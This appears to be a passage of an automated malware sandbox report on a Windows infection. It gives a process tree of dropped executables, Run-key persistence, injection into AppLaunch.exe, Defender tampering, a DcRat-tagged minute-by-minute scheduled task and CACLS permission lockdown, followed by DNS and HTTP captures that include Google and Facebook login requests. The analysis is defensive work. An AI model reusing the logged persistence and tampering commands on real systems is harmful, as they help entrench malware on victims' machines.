        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
        5⤵
        
        PID:1356
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
        5⤵
        
        PID:4464
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
        5⤵
        
        PID:5324
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
        5⤵
        
        PID:5604
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
        5⤵
        
        PID:5692
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8064 /prefetch:8
        5⤵
        
        PID:4760
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
      4⤵
      PID:4344
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa2f2946f8,0x7ffa2f294708,0x7ffa2f294718
        5⤵
        
        PID:1092
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,1817094410442473628,9095167288182008600,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:2
        5⤵
        
        PID:4944
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,1817094410442473628,9095167288182008600,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
        5⤵
        
        PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1828 -ip 1828
1⤵
PID:516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1064 -ip 1064
1⤵
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4132 -ip 4132
1⤵
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2936 -ip 2936
1⤵
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3024 -ip 3024
1⤵
PID:4312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4256

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:424

C:\Users\Admin\AppData\Local\Temp\E848.exe
C:\Users\Admin\AppData\Local\Temp\E848.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1652
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kj1Sn7Eh.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kj1Sn7Eh.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2824
- - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lR3zZ2Jw.exe
    C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lR3zZ2Jw.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5068
  - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gQ8wE3JA.exe
      C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gQ8wE3JA.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:4212
    - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\cx1ZL0LQ.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\cx1ZL0LQ.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2212
      - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1rH83xp7.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1rH83xp7.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4944
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 540
        8⤵
        Program crash
        
        PID:5296
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 140
        7⤵
        Program crash
        
        PID:5256

C:\Users\Admin\AppData\Local\Temp\F299.exe
C:\Users\Admin\AppData\Local\Temp\F299.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4888
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:4636
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 260
  2⤵
  - Program crash
  PID:3040

C:\Users\Admin\AppData\Local\Temp\F46F.bat
"C:\Users\Admin\AppData\Local\Temp\F46F.bat"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3748
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F577.tmp\F578.tmp\F579.bat C:\Users\Admin\AppData\Local\Temp\F46F.bat"
  2⤵
  PID:3240
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
    3⤵
    PID:5172
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa2f2946f8,0x7ffa2f294708,0x7ffa2f294718
      4⤵
      PID:5192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
    3⤵
    PID:5364

C:\Users\Admin\AppData\Local\Temp\F7FA.exe
C:\Users\Admin\AppData\Local\Temp\F7FA.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4880
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:5348
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 236
  2⤵
  - Program crash
  PID:5940

C:\Users\Admin\AppData\Local\Temp\FB57.exe
C:\Users\Admin\AppData\Local\Temp\FB57.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:3324

C:\Users\Admin\AppData\Local\Temp\FF7E.exe
C:\Users\Admin\AppData\Local\Temp\FF7E.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3188
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:4752
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:3904
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
    3⤵
    PID:1144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:3904
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:N"
      4⤵
      PID:4204
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:R" /E
      4⤵
      PID:5580
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5700
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:N"
      4⤵
      PID:5776
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:R" /E
      4⤵
      PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4888 -ip 4888
1⤵
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4944 -ip 4944
1⤵
PID:5164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5144 -ip 5144
1⤵
PID:5264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa2f2946f8,0x7ffa2f294708,0x7ffa2f294718
1⤵
PID:5376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4880 -ip 4880
1⤵
PID:5428

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:232

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

134.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.32.126.40.in-addr.arpa

IN PTR

Response
DNS

126.24.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.24.238.8.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

54.120.234.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.120.234.20.in-addr.arpa

IN PTR

Response
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

232.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.135.221.88.in-addr.arpa

IN PTR

Response

232.135.221.88.in-addr.arpa

IN PTR

a88-221-135-232deploystaticakamaitechnologiescom
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301250_1MLG2SHGO160JKUMX&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301250_1MLG2SHGO160JKUMX&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 714065
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9C1A570A7B1447E9A305EC3F35F87650 Ref B: BRU30EDGE0619 Ref C: 2023-10-11T09:24:38Z
date: Wed, 11 Oct 2023 09:24:37 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301678_17ZTGMBOXP9GMFDLK&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301678_17ZTGMBOXP9GMFDLK&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 335949
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AF83EBA55C074BFEB35BEA9B637AFA26 Ref B: BRU30EDGE0619 Ref C: 2023-10-11T09:24:38Z
date: Wed, 11 Oct 2023 09:24:37 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301659_1X4L46L6ILPPQI95F&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301659_1X4L46L6ILPPQI95F&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 448039
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E4095715E6FE4DFA88C2F31AABABA5FB Ref B: BRU30EDGE0619 Ref C: 2023-10-11T09:24:38Z
date: Wed, 11 Oct 2023 09:24:37 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300965_1DQ2FNZEHERI9UUJI&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300965_1DQ2FNZEHERI9UUJI&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 404223
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FE0EBB4AC9FF4F95933D9B77A16A6F87 Ref B: BRU30EDGE0619 Ref C: 2023-10-11T09:24:38Z
date: Wed, 11 Oct 2023 09:24:37 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301398_1SI4JLH5HQE0ZMCJV&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301398_1SI4JLH5HQE0ZMCJV&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 389443
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2BF4E7B792ED41F29D1B47E42EBB4D5A Ref B: BRU30EDGE0619 Ref C: 2023-10-11T09:24:39Z
date: Wed, 11 Oct 2023 09:24:38 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301269_1SV32GTE1U6J5ZYXG&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301269_1SV32GTE1U6J5ZYXG&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 744981
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5A5EF625386748D698EDB7E1215A005C Ref B: BRU30EDGE0619 Ref C: 2023-10-11T09:24:39Z
date: Wed, 11 Oct 2023 09:24:38 GMT
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

126.20.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.20.238.8.in-addr.arpa

IN PTR

Response
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.201.35
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:_xUqEQ6tg2xeGMxchQaR3_1RiuwIzg:wKGKay2xewG5ZrV7
GET

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhetRvTZVDNhN73tA4xp3HSjZ59LcyT_f5hknamM9G2yywQdoXqZ97nGj9VnG6XaHRSuDDR2SA

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhetRvTZVDNhN73tA4xp3HSjZ59LcyT_f5hknamM9G2yywQdoXqZ97nGj9VnG6XaHRSuDDR2SA HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:RBTJBksj2HNA0mj0jMvNq9fmp1AI3w:pVn4zU_e4YwlWEB1
GET

